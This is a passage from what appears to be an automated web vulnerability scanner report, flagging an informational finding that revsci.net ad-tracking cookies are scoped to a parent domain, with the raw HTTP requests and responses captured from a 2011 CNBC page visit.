The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uzs22rMriQJ4Ym1N1EuC/pV+zq2jLxL9z1pFHcD2oMpIyt/lxMhiEmSOkHFIHZeBImHWKCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa0AbFjW9PtKIFHNv4PL1RUaJzrH2RPUn836DjPQ4L4Uubj0NaY9wI2qjpCay/9h6Y4N/vrTyarBrZy/5p1vkVo6HLAj5TEabu+hT6vuj41246c95NOaRAsl5hE/RAIN0jCKWeIrwU7hjL6yZdj93XkHnxuY5dXdsfw5hXREUlMqNPwkFtFYTAJwanBh5yYsGo3OuU23g4Sg+m/4oPiiW7+wP+sVJlWRijizVDRqGD+7XWyoETDu18Mfh38sGaLcBo3I8QKLVIHNbs/aPybUAp6deZ4PBam+j59FVp3j+OlK6mRTtV96HqNd0fyLSobj39hOpsGmZ9PBCS6PKnceOCU88KZYLjs9D/ogMjd3GXexqu6MMY+wrZ69abotqDqceVMfHYfc+u2rmmXQ4kjNvvzLnMiPUxpeWc6y6IrrLSU0aP1/RHBvaBGvVfQk5WA2CVlofLvT7Y9pNS4wEX/g0OMG57+HjZ94Wzt+9Or8hTS/+8rX4EUFAaGTKw1EMVr66bOxGGryE/WfC4AIQtPbpwiE6dJQwvbOys=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 16:33:34 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/206078584.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=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; rsiPus_U8dj="MLsXtSUNJzhrJYH0ScWkPkhBBfNq5qBaGQ3qzoP5JNmfywk+VjEpdZsm4S1ALLEl9uEMqoswBjdcxeQyunNDitFk50pmyRiATOnYWrT9OTGMOLvtOARTPXXas/i+lRqKsz96RexQdtG5Q0htmtW0occj/xxuKj5M6FdWl4boS08OQ55eVx3TuTLfH88ZzK03D60TU7yQOB0IkucpXq/KA6fGrwn3xyBKEfC/Hq+Akxwy8JmcGDgAzvGxxcoTvoDlw+NhmIjtYY51WWniTdNjWuJuNJQ0UlLscNM2dO30PO7Uk+ajEwEL0u0uQUKJOcQeBmPsfOLPDrPLuEPwP60Ri4atKHUY0TJS0ZbUKefBs51fZ9nherfF6CdzScge1votC3cOBbGEDxtqG06rUIO/mgUmdG6JU8j7v35yIbmIVwkHzqPSn5ZDLNSXuVp1QMQDLNtUrVgPz6Jl9ztEc69uVmj3Ln95WYQ081AGHUjwJDX94TMW52h7EZrZ7yhhhwJ/On+PVsdROkOkrY7Ffhhb1fYmx28qJu1wWXzfmMn6LcuSCeo81f01+KZzachYvMdhl/V4W7bE5opzNfIwgzK3h1cvFrAoWMiTZlnIAqEcta2BdGFWtAdtVAWQby/9GchpVNi+ljPn9bntrl78ZewyUGzbFEburcb77W75T40XpUxQm89QzaDr0z3L09PnjPT1hzxEktTgqRFpmlGwjSBNWrDsprMDfyA/wxa/rpSLUQE8rlmzGKQav7/QwXsLW4ee7ToXXnZRro8Ktf10qG6En7JPa1pF2urhK/c8YV/7g5CAIlWQgFto443SSOi7B/4O35HXpOZsUxrMwXkMqsgMj+rhoWhDTczKAv42VUP82pBmxbEz+mZ4xlvd3QQO5wmuwhSx5aN7JyT5JL1IDDctLTqO+tGo5TLMUw/TdkGl3cSN06sIHYySi62LsemC5SagFmTQPfZZHjkh6sjeuIo4GjYIReqmyd+Zd3nQVKm666Tt4oCmei7RTKK87epL/n0jgd1eU7w0/b2XChLal/5tIW/LW/sETsjo+KerLIjA7VFuyklcaqk+Ol06pEhyE0jF8BZ7PE8mtpgsVsxFFP0cme8rUIKPi+mQmpiz5pBEyUrBMrPnScUeY+ZT/sE11nyh7HE2hSa4rV86z0u9bUckT6slYcAAdfxDIt+oYtmmXZhEVNR3G5qKVyVCGgTNjoi7/icj9NyecApst+OtFYl898wTxWLNTzFb+kxa+i1gxt6oklB+Lsmo/jjq0B0bldrAnTt6G1YvE82UcYspEk0IwVpfq8+rB3pzqOgo86lbS6zbGPIr1vEoE6JMZPfgz0XGJ/VhaC4sceW1zYOm97MyrSIiWMXv"; rsi_us_1000000="pUM14zlDOBYUrmdq3jOQHhP1oW9v6as6+sxQfs7CWLc8xuT89ZHI5IXcnyiRh34yc/Lp3I/C02XV/FhISIET3DoXXrpwJ0+gjSq9wHoxyB1DqkHe/o52XtD7YyIAkz8Ely74px5B+BiiIYCtxvVQUOcP+dEm7YUihr083h7ZQP75dLVBQIEa90fr1wqVQFQSc2d/cn3V7ZhcBqD9zxga5ZgJMqRM4cM+pbzUWUwG7HxdfWt39JFWYuCsoPkinx7fXl8KwuGitaxk6N8+31USlI22V8LboQ5+EtwPObWXMCjUM5b2MTqbZoSMh1+ztRFwmLheUTQiDQTC8iuGbSx7isBy/Lmj+LaN3zTYeeVsF0Sfw5AD8La/2sO4T+DfQSSiv+XW4LOUBaM5jInrYHXwLMUGxvHNfIYYuwC6M6HUJEtn9+PtnGh0ilaBSqp8O+bugcQQTmqeoej6Y+rH/6sphpWM414YBQFzyybncc95bUZ1qDP7RGHd/5A+ylpHtr+uAaD7PfRv1Ii87LkjD9et2LLQ2+Un9w3O2vHJ/rQWFkTvXu/QZWeREaEw23yP1kT63Sk6CqyuUcJjtQCHk07PaOXvt1/0z/5VdyY/dIgw/hfuOVVRLtcX761Wy7TseUGrxOw27aXrnYM+Rczif02stqi7zyFBrEO3QGFwJx5XPJRu0MWfXP9wg7g2GAt7RUsXcn3RImI6D/ItwdFT9x66aLAQ/IiQF4d9kYvhPVoJ33KLRiyPyyqvnlwomuPXx1AL/s4gCQx7iCMj2rSci7rGFjE/SesGbTH+EVLU/DSjo4Z1wSxI0c1NkcQVPdX4iC63T3naJcUxCRP9/Q5dmUAS1Hmgfw19E/b88EehT+Px2Xgv961XGNzKzZ9itF+RwPfYmmftsFLwfbICVGpOZZBf54bevWlYfS+yigmETDyqu0pu7ypQkl4OMgsuttak9SnKJ+iEG9kRd8CI64rlEOaQT3VTiCThmyoUxxFIsEJs/2xcz7PSuuuYofETbwQjIvNq24YgirGo4LUhNYUOa9JdlhBvXnUC5ubsxNGP7yONFT44PfCNHwQD1l678ZB/+tUKoH90VMV2V2lMU++3WvgxYdTL9RUomOVux4EU2c72sYlsvES+hIJ1MPQU3LaXJ/SiNaed0wUffkP81DZP7wgbDV01P9z1/fLgu0rgsPa7VPO3nm3lhAbNTY+iGejTjSomhNT4aVMuggU3f8pOa2OZJG+gAikR5xEuwx5MXX+MkiWQQ8RuVkz1QDhlwUUStE9SdeGsS8up2wB/TTsZtrLGtO7FWNreu3gDNBqF4GZrh/b7FxFo0b/VxyadfKbd0PAwuzMjODCoRUZ5GWdsmq0YomEUsdCb6Y/asi4a6F0DCj76NeVrxwPdMzVLGft4HYt6gcWMlc9u1Af0aaL7dhs6PGZbtNwOmbewQuez+bYYH814Ja5cfvyISWWBw1f01gNgfonxpSfuXob+bOXGBBFWg7hGiRM8FVkq22z0Rso8BBdxVbOQ0s0wCVuyv23hse0R0/f60x+SGx5NRCoHDdbkhJH9QQWqgig/rdm+2U8cj+zqBIIrrYXqRKCSNRR62OVcjoduceVIe02RJgDhJdvhwpq/iHySurZ4MfUa6SK3L9uNdB2V1Fd/rmrdhgSw64oVQBcbs12yBYzS7u+teCazvIh/bL12UF8dpVYBxmXVn857SQnunPXwDkORMAaZyE8iYKn96YpecKFhdbuUxzw6Zh6lvgrJpqNatk9XHPe4J4O6wiYF6B/PHWfMap5f5ejQ5OE="; rsi_segs_1000000=pUPF5EOhOHMQT7uItGF29vyo/tk8g7ZPQp/FTCAB2QQ4O3XY0n+Y1T9p9LQR/PMkrQWV5q//GhmELDb2WDbVjIJteif4fOffjX8iq0xsqPPwv6rrUdcIwSmkFOWlzUMTmbjeI5py/GeW6vTj+wWQEAWvERCASNKUW1ejPcGmrIUMmJ/o5PxXjqVBdRDmufS+NYRr1Q+VnhvMCavKi8EDZe5QGsI+pkIh9yzH3rUTaGWWXQU0Ed6h3BIUCMlj2TArZOWXhnqVDhmJxfG1UR86XEiHrbbTnQKw+T6i+Wvf1e5Hg2E7p9yWQaV+9HWbZ0C78wJipEuzcz1yT+HlOtRu/EmYN9zeCWWaqwRlov0oxjsNeu2+lYr7BP/bxWFcXC1xKsPTtMbc8XnixKis2l+N3se7jHFkeQJh7tu1xdJ4Kjb8bCs31iSkOEOguNJRWKb9yKagnZUIZgsvFozyuzncRpG6a7ewKSzbtrIxXFLuA0FaSMhm06fisWvYJSsMWuk4t7jgY81r+yolKvp3D/Ci6hGNHqCcmpBdYdZho+uLCE6vyBtQLChUXPl+uuA8ryr9Xa+mttDWNRKHSQw0cLNwnCnp3H2FRAEywdIt0+GZNamstO6+Xb+nd8LVzmRua4vUeMxE6yHH3lM7DR+jhrxdv2J2NNM=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uzs22rMriQJ4Ym1N1EuC/pV+zq2jLxL9z1pFHcD2oMpIyt/lxMhiEmSOkHFIHZeBImHWKCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa0AbFjW9PtKIFHNv4PL1RUaJzrH2RPUn836DjPQ4L4Uubj0NaY9wI2qjpCay/9h6Y4N/vrTyarBrZy/5p1vkVo6HLAj5TEabu+hT6vuj41246c95NOaRAsl5hE/RAIN0jCKWeIrwU7hjL6yZdj93XkHnxuY5dXdsfw5hXREUlMqNPwkFtFYTAJwanBh5yYsGo3OuU23g4Sg+m/4oPiiW7+wP+sVJlWRijizVDRqGD+7XWyoETDu18Mfh38sGaLcBo3I8QKLVIHNbs/aPybUAp6deZ4PBam+j59FVp3j+OlK6mRTtV96HqNd0fyLSobj39hOpsGmZ9PBCS6PKnceOCU88KZYLjs9D/ogMjd3GXexqu6MMY+wrZ69abotqDqceVMfHYfc+u2rmmXQ4kjNvvzLnMiPUxpeWc6y6IrrLSU0aP1/RHBvaBGvVfQk5WA2CVlofLvT7Y9pNS4wEX/g0OMG57+HjZ94Wzt+9Or8hTS/+8rX4EUFAaGTKw1EMVr66bOxGGryE/WfC4AIQtPbpwiE6dJQwvbOys=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 16:33:34 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 16:33:33 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.133. http://pix04.revsci.net/I10985/b3/0/3/1008211/209054641.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/209054641.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKkIGSNrjQ0ubO+9Micc4VPat72X0BRE3fm6MNJiHGaKzb2aFbVTIYQ62RMPFHPf1Uqh8hkiOCKE0bhWe4kKQnkl16tq9preAxHphFoGataiCY4MsktlzVfsKejSNKUW1ejPcGmrIUMmJ/opLuXBEJqalRFyzz++kuS0t8FA35bmxx0VdxUYxuojQ2BuD0f+WbEpIzndJG/fogQhMe7wsnGx0ZUA1LRvIqc1ZCRGQnqo6lbb+SRPPRh/aj5ttCTYTqJZoUmIGRGDibHTk5RafHTptYvn794Rs5a/AWZGNMU4OCXav6JqC5f8352w1VO+fHAsHBzN5QM+rXeCDcD+XndQ7mVjybMVz3Xhpkr82fBvQR7L6J9TP2yJB5UGVSHaB0iP0UXysGpt8BQZJKrAXqWNdC8j5RJRevXcnOdwvsBDYngTpLHnpZcnpGu0GwY+oVizJVL3FAOJ32n+jFrveJjzca4RlI0UQepclJQX98N04vrgQEdHsQ6njPT1lzdhOVSJXxNN+bF+NI8ER6MvpozFNuNYmb09NhBEtrJKtc9WLdXNDoRYU8JuCrcaBttPw/VxiLOLeaQZKi3jv7+7jd5kgqeLc4hFM5jxgEd64JthvvboB1bYjhQ; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 15:46:59 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/209054641.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEn